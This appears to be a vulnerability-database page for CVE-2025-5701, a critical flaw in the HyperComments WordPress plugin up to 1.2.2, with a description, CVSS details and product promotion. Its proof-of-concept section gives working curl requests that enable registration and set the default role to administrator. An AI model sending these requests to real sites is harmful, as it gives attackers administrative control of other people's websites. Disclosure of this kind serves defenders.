| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| Exploit for CVE-2025-5701 | 12 Jun 202508:27 | – | githubexploit | |
| Exploit for CVE-2025-5701 | 11 Feb 202607:57 | – | githubexploit | |
| Exploit for CVE-2025-5701 | 5 Jun 202515:27 | – | githubexploit | |
| CVE-2025-5701 | 5 Jun 202511:45 | – | circl | |
| WordPress plugin HyperComments 安全漏洞 | 5 Jun 202500:00 | – | cnnvd | |
| CVE-2025-5701 | 5 Jun 202511:15 | – | cve | |
| CVE-2025-5701 HyperComments <= 1.2.2 - Unauthenticated (Subscriber+) Arbitrary Options Update | 5 Jun 202511:15 | – | cvelist | |
| EUVD-2025-16984 | 3 Oct 202520:07 | – | euvd | |
| HyperComments <= 1.2.2 - Arbitrary Options Update | 3 Jun 202606:04 | – | nuclei | |
| CVE-2025-5701 | 5 Jun 202512:15 | – | nvd |
# CVE-2025-5701
HyperComments <= 1.2.2 - Unauthenticated (Subscriber+) Arbitrary Options Update
# Description
The HyperComments plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the hc_request_handler function in all versions up to, and including, 1.2.2. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.
## Details
- **Type**: plugin
- **Slug**: hypercomments
- **Affected Version**: 1.2.2
- **CVSS Score**: 9.8
- **CVSS Rating**: Critical
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **CVE**: CVE-2025-5701
- **Status**: Closed
POC
---
```
curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
-d "data={\"users_can_register\":\"1\",\"default_role\":\"administrator\"}" \
-H "Content-Type: application/x-www-form-urlencoded"
```
```
curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
-d "data={\"users_can_register\":\"1\",\"users_can_register\":\"1\"}" \
-H "Content-Type: application/x-www-form-urlencoded"
```Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation